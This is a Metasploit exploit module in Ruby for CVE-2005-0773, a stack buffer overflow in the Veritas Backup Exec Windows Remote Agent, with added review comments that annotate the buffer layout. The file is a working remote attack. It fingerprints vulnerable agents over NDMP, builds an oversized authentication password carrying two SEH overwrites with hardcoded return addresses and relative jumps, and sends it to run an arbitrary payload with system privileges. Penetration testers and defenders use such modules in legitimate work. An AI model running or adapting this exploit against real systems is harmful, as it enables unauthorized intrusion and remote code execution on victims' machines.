##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Veritas Backup Exec Windows Remote Agent overflow (CVE-2005-0773).
#
# Speaks NDMP to the agent's control port (default 10000), then sends a
# CONNECT_CLIENT_AUTH request (message 0x901) with authentication type 3
# and an 8192-byte password. The oversized password overwrites a SEH
# record on the agent's stack; the module plants two candidate SEH frames
# (one per known product layout) that both jump back into the payload
# placed earlier in the same buffer.
#
# Everything below is offset-sensitive: the payload position, the two SEH
# frame offsets and the relative jump displacements are tied to each
# other (see the arithmetic in #exploit) and to the 'Space' value in the
# payload spec. Change one and you must re-derive the others.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::NDMP

  # Registers module metadata (description, references, targets, payload
  # constraints) and the single RPORT option.
  #
  # @param info [Hash] metadata merged into the module description
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Veritas Backup Exec Windows Remote Agent Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in the Veritas
          BackupExec Windows Agent software. This vulnerability occurs
          when a client authentication request is received with type
          '3' and a long password argument. Reliable execution is
          obtained by abusing the stack buffer overflow to smash a SEH
          pointer.
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2005-0773'],
          [ 'OSVDB', '17624'],
          [ 'BID', '14022'],
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities']
        ],
        'Privileged' => true,
        'DefaultOptions' => {
          'EXITFUNC' => 'process'
        },
        'Payload' => {
          # 1024 is not arbitrary: the backward jumps in #exploit land at
          # offset 3536 - 1024 = 2512, i.e. they assume the encoded payload
          # fills exactly this much space. Keep in sync with #exploit.
          'Space' => 1024,
          # The password is length-prefixed on the wire ('N' in #exploit),
          # but the agent's copy still stops at NUL, so NUL is the only
          # bad byte declared. NOTE(review): this is what the spec says,
          # the truncation behavior itself is not visible here.
          'BadChars' => "\x00",
          'StackAdjustment' => -3500
        },
        'Targets' => [
          [
            # Rets[0] is used by the 9.0/9.1 SEH frame and Rets[1] by the
            # 10.0 frame (see #exploit). These are fixed addresses inside
            # the product's own image space (0x014xxxxx), so the module
            # presumably relies on the absence of ASLR on these platforms.
            'Veritas BE 9.0/9.1/10.0 (All Windows)',
            {
              'Platform' => 'win',
              'Rets' => [ 0x0140f8d5, 0x014261b0 ]
            },
          ],
          [
            # Same layout; both frames reuse a single OS-supplied address.
            'Veritas BE 9.0/9.1/10.0 (Windows 2000)',
            {
              'Platform' => 'win',
              'Rets' => [ 0x75022ac4, 0x75022ac4 ]
            },
          ],
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2005-06-22',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(10000)
      ]
    )
  end

  # Fingerprints the agent over NDMP without sending the overflow.
  #
  # Asks the mixin for the agent's host/vendor/version record and reports
  # Appears only when the vendor string contains "VERITAS" and the version
  # is exactly 4.2 or 5.1. Anything else (including no answer at all) is
  # reported as Safe, so a non-responding or unknown host is never
  # flagged as vulnerable.
  #
  # NOTE(review): the 4.2/5.1 values are whatever ndmp_info reports,
  # presumably the agent's own version string rather than the Backup Exec
  # product version named in the targets; confirm against the mixin.
  # NOTE(review): `=~` on a non-String value is gone in Ruby >= 3.2, so if
  # ndmp_info can hand back a non-String 'Version' this raises; and `^`/`$`
  # are line anchors, a multi-line value containing "4.2" on its own line
  # would still match. Both are only concerns if the mixin's output shape
  # allows them.
  #
  # @return [Exploit::CheckCode] Appears or Safe
  def check
    info = ndmp_info
    if (info and info['Version'])
      vprint_status(" Vendor: #{info['Vendor']}")
      vprint_status("Product: #{info['Product']}")
      vprint_status("Version: #{info['Version']}")

      if (info['Vendor'] =~ /VERITAS/i and info['Version'] =~ /^(4\.2|5\.1)$/)
        return Exploit::CheckCode::Appears
      end
    end
    return Exploit::CheckCode::Safe
  end

  # Builds and sends the malicious CONNECT_CLIENT_AUTH request.
  #
  # Buffer layout of the 8192-byte `password` field (all offsets are byte
  # offsets into `password`):
  #
  #   2512..3535   encoded payload (3536 - Space, assuming Space == 1024)
  #   3536..3537   EB 06      short jmp +6 (skips the handler address)
  #   3538..3539   random filler, left untouched
  #   3540..3543   Rets[1]    SEH handler address for the 10.0 layout
  #   3544..3548   E9 rel32   jmp -1037 -> 3549 - 1037 = 2512
  #   4524..4525   EB 06      second frame, same shape, for 9.0/9.1
  #   4528..4531   Rets[0]
  #   4532..4536   E9 rel32   jmp -2025 -> 4537 - 2025 = 2512
  #
  # Whichever SEH record the agent actually overwrites, control goes to
  # the handler address, which is expected to bounce into the short jmp
  # stored in the "next" pointer slot just before it, and from there back
  # to offset 2512.
  #
  # NOTE(review): both backward jumps target 2512 unconditionally, so the
  # scheme relies on `payload.encoded` being exactly 1024 bytes (the
  # framework NOP-padding shorter payloads up to 'Space'). If the padding
  # did not happen, the jump would land in the random alphanumeric filler
  # in front of a shorter payload. Presumed true; confirm before touching
  # 'Space' or the displacements.
  #
  # @return [void]
  def exploit
    connect

    print_status("Trying target #{target.name}...")

    # Consume the server's initial NDMP message before talking.
    ndmp_recv

    username = 'X' * 512
    # Random alphanumeric filler (no NULs, so it stays clear of BadChars).
    password = rand_text_alphanumeric(8192)

    # Place our payload early in the request and jump backwards into it
    password[3536 - payload.encoded.length, payload.encoded.length] = payload.encoded

    # This offset is required for version 10.0
    password[3536, 2] = "\xeb\x06"
    password[3540, 4] = [ target['Rets'][1] ].pack('V')
    password[3544, 5] = "\xe9" + [-1037].pack('V')

    # This offset is required for version 9.0/9.1
    password[4524, 2] = "\xeb\x06"
    password[4528, 4] = [ target['Rets'][0] ].pack('V')
    password[4532, 5] = "\xe9" + [-2025].pack('V')

    # Create the authentication request
    # NDMP header: seven big-endian 32-bit words, then the two
    # length-prefixed strings and a trailing word.
    auth = [
      1, # Sequence number
      Time.now.to_i, # Current time
      0, # Message type (request)
      0x901, # Message name (connect_client_auth)
      0, # Reply sequence number
      0, # Error status
      3 # Authentication type
    ].pack('NNNNNNN') +
      [ username.length ].pack('N') + username +
      [ password.length ].pack('N') + password +
      [ 4 ].pack('N')

    print_status('Sending authentication request...')
    ndmp_send(auth)

    # Attempt to read a reply (this should fail)
    # NOTE(review): if ndmp_recv raises on the reset connection rather than
    # returning nil, `handler`/`disconnect` below are skipped; whether that
    # matters depends on the mixin's read behavior, which is not visible
    # here.
    ndmp_recv

    handler
    disconnect
  end
end